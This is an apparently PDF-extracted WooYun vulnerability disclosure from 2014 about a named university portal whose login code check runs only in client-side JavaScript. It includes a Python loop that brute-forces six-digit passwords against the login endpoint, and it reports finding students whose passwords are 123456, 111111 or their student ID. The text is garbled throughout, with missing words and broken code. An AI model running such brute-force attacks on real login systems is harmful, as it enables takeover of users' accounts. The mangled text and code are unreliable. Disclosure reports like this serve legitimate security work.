高校信息门户设计缺陷致密码易被猜解.pdfVIP

概要

编号：wooyun-2014-082411

标题：大学信息门户设计不当可以用户（利用猜用户）

相关厂商：nankai.edu.cn

作者：路人甲

提交时间：2014-11-0717:37

修复时间：2014-12-2217:40

公开时间：2014-12-2217:40

类型：未/权限绕过

危害等级：中

自评Rank：8

状态：已交由第合作机构(CCERT应急响应组)处理

：，疑问或需要帮助请联系[emailpr

otected]

Tags：无

详情

披露状态：

2014-11-07：细节已厂商并且等待厂商处理中

2014-11-10：厂商已经确认，细节仅向厂商公开

2014-11-20：细节向子及相关领域专家公开

2014-11-30：细节向普通子公开

2014-12-10：细节向实习子公开

2014-12-22：细节向公众公开

简要描述：

危害么？可以查找全校为某个固定字符串的所有同学。，然后造成不必要的信息。。

有呀。。

详细说明：

由于该系统的是由本地js生成并且仅仅在本地用js验证，因此，可以直接把绕

过。这样就可以用一个不断发送post请求，根据服务器返回的结果判断正确与否。

部分python代码如下：

foriinrange(100000,999999+1):

data[Login.Token2]=str(i)

print(i)

dat=urllib.urlencode(data)#encoding

req

=urllib2.Request(

lidate1.portal,dat,headers1)#request

response=urllib2.urlopen(req)#receivethe

response

html=response.read()#readtheresponse

decode_html=html.decode(UTF-8)

iflen(decode_html)97:

break

证明：

贴图几张：

上图为单独有针对性的刷。

这是是123456的同学的学号。有5人

这是是111111的同学的学号。有10人

这是跟学号相同的同学的学号。这些同学我数了一下，足